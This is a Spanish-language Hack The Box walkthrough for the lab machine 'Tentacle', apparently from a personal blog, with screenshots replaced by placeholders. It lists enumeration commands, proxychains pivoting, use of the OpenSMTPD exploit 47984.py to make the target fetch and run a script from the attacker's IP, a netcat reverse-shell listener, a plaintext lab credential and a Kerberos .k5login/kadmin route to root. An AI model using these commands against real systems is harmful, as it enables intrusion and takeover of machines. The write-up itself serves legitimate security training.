Cu3rv0x
Tentacle

Tentacle


HTB Linux

echo "10.129.50.237 tentacle.htb" | sudo tee -a /etc/hosts

ssh_command.

ping -c 1 10.129.50.237

ssh_command.

nmap -A -p- -oA tentacle 10.129.50.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA tentacle 10.129.50.237

nmap -sU -O -p- -oA tentacle-udp 10.129.50.237

ssh_command.

ssh_command.

Si vamos a http://10.129.50.237:3128

ssh_command.

Vemos que tienen dos subdominios en la pagina y los agregamos realcorp.htb y srv01.realcorp.htb al /etc/hosts

ssh_command.

dig @10.129.50.237 realcorp.htb

ssh_command.

dig @10.129.50.237 realcorp.htb ns

ssh_command.

dig @10.129.50.237 realcorp.htb mx

dig @10.129.50.237 realcorp.htb axfr

Agregamos http 10.129.50.237 a etc/proxychains.conf

ssh_command.

proxychains nmap -sT -Pn -v -n 127.0.0.1

ssh_command.

dnsenum --dnserver 10.129.50.237 -f /usr/share/seclists/Discovery/DNS/subdomain-topmillion-110000.txt realcorp.htb

ssh_command.

Agregamos lo siguiente en /etc/hosts

ssh_command.

Vamos a /etc/proxychains.conf y agregamos lo siguiente:

ssh_command.

proxychains nmap -sT -Pn -v -n 10.197.243.77

ssh_command.

Creamos un script para chequear puertos

ssh_command.

./proxychains_portScanner.sh

ssh_command.

Modificamos proxychains.conf

ssh_command.

corremos el bash de nuevo

./proxychains_portScanner.sh

proxychains curl http://wpad.realcorp.htb/wpad.dat | bat -l js

ssh_command.

ssh_command.

Modificamos el script

ssh_command.

Corremos el script de bash

ssh_command.

nmap -sT -Pn -p25 -sCV 10.241.251.113

ssh_command.

searchsploit opensmtpd

ssh_command.

searchsploit -m 47984

ssh_command.

cat users

ssh_command.

/opt/kerbrute/kerbrute usernum --dc 10.129.50.237 -d realcorp.htb users

ssh_command.

proxychains python3 47984.py 10.241.251.113 25 'wget 10.10.14.73'

ssh_command.

Creamos un archivo llamado cu3rvox.sh

cat cu3rv0x.sh

ssh_command.

En el archivo 47984.py cambias <\root> a <\j.nakazawa@realcorp.htb>

ssh_command.

Podemos ver que el servidor responde con un 200 despues del GET

ssh_command.

proxychains python3 47984.py 10.241.251.113 25 'bash /tmp/cu3rv0x.sh'

ssh_command.

nc -lvnp 4444

ssh_command.

sshpass -p 'sJB}RM>6z~64_' ssh j.nakazawa@10.129.50.237

ssh_command.

Abrimos /etc/krb5.conf

default_realm = REALCORP.HTB  
  
REALCORP.HTB = {  
        kdc = 10.129.50.237  
        }

kinit j.nakazawa

ssh_command.

klist

ssh_command.

ssh j.nakazawa@10.129.50.237

Credenciales -> j.nakazawa:sJB}RM>6Z~64_

cat user.txt

ssh_command.

cat /etc/crontab

ssh_command.

cat /usr/local/bin/log_backup.sh

echo "j.nakazawa@REALCORP.HTB" > .k5login

cat .k5login

cp .k5login /var/log/squid

ssh_command.

ssh admin@srv01.realcorp.htb

ssh_command. klist -k /etc/krb5.keytab

ssh_command.

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB

Creamos una contrasena para root@REALCORP.HTB

exit

ssh_command.

ksu root

ssh_command.

© 2025 Cu3rv0x